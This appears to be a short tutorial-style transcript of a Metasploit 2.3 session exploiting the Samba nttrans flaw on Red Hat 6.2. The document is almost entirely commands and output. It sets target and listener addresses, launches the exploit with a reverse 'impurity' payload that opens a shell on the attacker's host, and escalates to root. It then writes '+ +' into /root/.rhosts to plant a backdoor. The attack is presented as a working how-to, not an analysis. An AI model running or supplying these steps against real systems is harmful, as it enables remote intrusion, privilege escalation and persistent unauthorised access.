1) Determine your metasploit interface and options

+ -- --=[ msfconsole v2.3 [46 exploits - 68 payloads]

msf > setg RHOST 192.168.0.252
RHOST -> 192.168.0.252
msf > setg LHOST 192.168.0.20
LHOST -> 192.168.0.20
msf > use samba_nttrans
msf samba_nttrans > set TARGET 3
TARGET -> 3


2) Set PAYLOAD to linux_ia32_reverse_impurity

msf samba_nttrans > set PAYLOAD linux_ia32_reverse_impurity
PAYLOAD -> linux_ia32_reverse_impurity


3) Set PEXEC to the path of your impurity module

msf samba_nttrans(linux_ia32_reverse_impurity) > set PEXEC data/shelldemo
PEXEC -> data/shelldemo


4) Launch the exploit

msf samba_nttrans(linux_ia32_reverse_impurity) > exploit
[*] Starting Reverse Handler.
[*] Starting attack against target Samba 2.0.6 / Red Hat 6.2
[*] Attack will use 1 threads with 1 total attempts

[*] Establishing 1 connection(s) to the target...
[*] --- Setting up the SMB session...
[*] --- Establishing tree connection...
[*] --- Sending first nttrans component...
[*] --- Completed range 0x08138300:0x08137cc0
[*] Got connection from 192.168.0.20:4321 <-> 192.168.0.252:1066
[*] Sleeping before sending impurity data.
[*] Uploading impurity data (17600), Please wait...
[*] Executing impurity data.

--=[ Impurity Demo Shell
impurity demo >


5) Use the Impurity shell!

impurity demo > help
Available Commands:
   exec  <cmd>          Fork and execute a command
   lsfd                 Show all open file descriptors
   open  <path>         Open a file and return the file descriptor
   read  <fd> [bytes]   Read <bytes> from file descriptor
   write <fd> <bytes>   Write <bytes> to file descriptor
   close <fd>           Close a specified file descriptor
   unlink <path>        Remove the specified file
   getid                Print uid/gid
   setuid <uid>         Set UID to the specified number
   setgid <gid>         Set GID to the specified number
   help                 Show this help screen
   quit                 Exit the Impurity Demo shell
impurity demo > getid
uid=0(root) gid=0(root) euid=99(nobody) egid=99(nobody)
impurity demo > open /root/.rhosts
OPEN: ERROR [/root/.rhosts]
impurity demo > setuid 0
SETUID: 0
impurity demo > setgid 0
SETGID: 0
impurity demo > getid
uid=0(root) gid=0(root)
impurity demo > open /root/.rhosts
OPEN: 10
impurity demo > write 10 3
+ +
WRITE: 3
impurity demo >
